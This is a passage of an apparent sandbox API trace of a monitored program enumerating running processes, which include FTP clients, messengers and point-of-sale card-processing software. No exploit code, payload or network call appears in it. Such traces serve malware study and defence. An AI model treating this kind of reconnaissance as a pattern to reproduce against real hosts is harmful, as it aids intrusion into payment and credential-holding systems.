lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0218.193] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0218.195] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0218.197] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0218.203] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0218.205] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0218.207] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0218.209] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0218.212] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0218.266] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0218.268] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0218.270] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0218.271] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0218.273] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0218.275] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0218.279] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0218.281] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0218.282] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0218.284] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0218.285] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0218.287] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0218.289] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0218.291] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0218.295] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0218.296] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0218.298] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0218.299] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0218.301] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0218.303] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0218.304] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0218.306] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0218.315] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0218.317] CloseHandle (hObject=0x101c) returned 1 [0218.317] Sleep (dwMilliseconds=0x64) [0218.435] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2268 [0218.446] Process32First (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.447] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0218.449] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0218.450] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.452] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0218.453] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.455] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0218.456] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0218.458] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0218.460] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.461] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.463] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0218.464] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.466] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.467] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.469] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.470] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.471] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.473] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.474] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0218.476] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0218.477] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0218.509] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.511] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.513] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0218.514] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0218.516] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0218.517] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0218.519] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.520] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0218.521] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0218.523] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0218.525] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0218.533] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0218.535] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0218.536] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0218.538] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0218.539] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0218.540] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0218.542] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0218.543] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0218.544] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0218.546] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0218.547] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0218.548] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0218.550] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0218.551] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0218.553] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0218.554] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0218.555] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0218.557] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0218.574] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0218.575] 